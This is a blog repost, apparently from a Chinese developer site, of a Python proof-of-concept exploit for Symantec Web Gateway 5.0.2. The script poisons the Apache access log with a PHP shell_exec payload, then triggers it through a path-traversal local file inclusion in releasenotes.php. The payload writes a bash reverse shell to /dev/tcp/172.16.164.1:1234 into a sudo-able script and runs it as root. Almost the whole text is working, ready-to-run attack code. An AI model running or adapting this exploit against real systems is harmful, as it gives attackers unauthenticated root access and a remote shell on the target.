Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof

最新推荐文章于 2024-07-15 10:00:09 发布

cnbird2008

最新推荐文章于 2024-07-15 10:00:09 发布

阅读量810

点赞数

文章标签： web authentication stream socket import apache

#!/usr/bin/python 
 
 # Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept 
 
 # Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. 
 
 # muts at offensive-security dot com 
 
 import  socket 
 
 import  base64 
 
 payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
 
 payloadencoded=base64.encodestring(payload).replace("\n","") 
 
 taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded  
 
 expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )  
 
 expl.connect(("172.16.164.129", 80)) 
 
 expl.send(taint) 
 
 expl.close() 
 
 trigger="GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n"
 
 expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )  
 
 expl.connect(("172.16.164.129", 80)) 
 
 expl.send(trigger) 
 
 expl.close()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

cnbird2008

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof

#!/usr/bin/python # Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept# Exploit requires no authentication, /tmp/networkScript
复制链接

扫一扫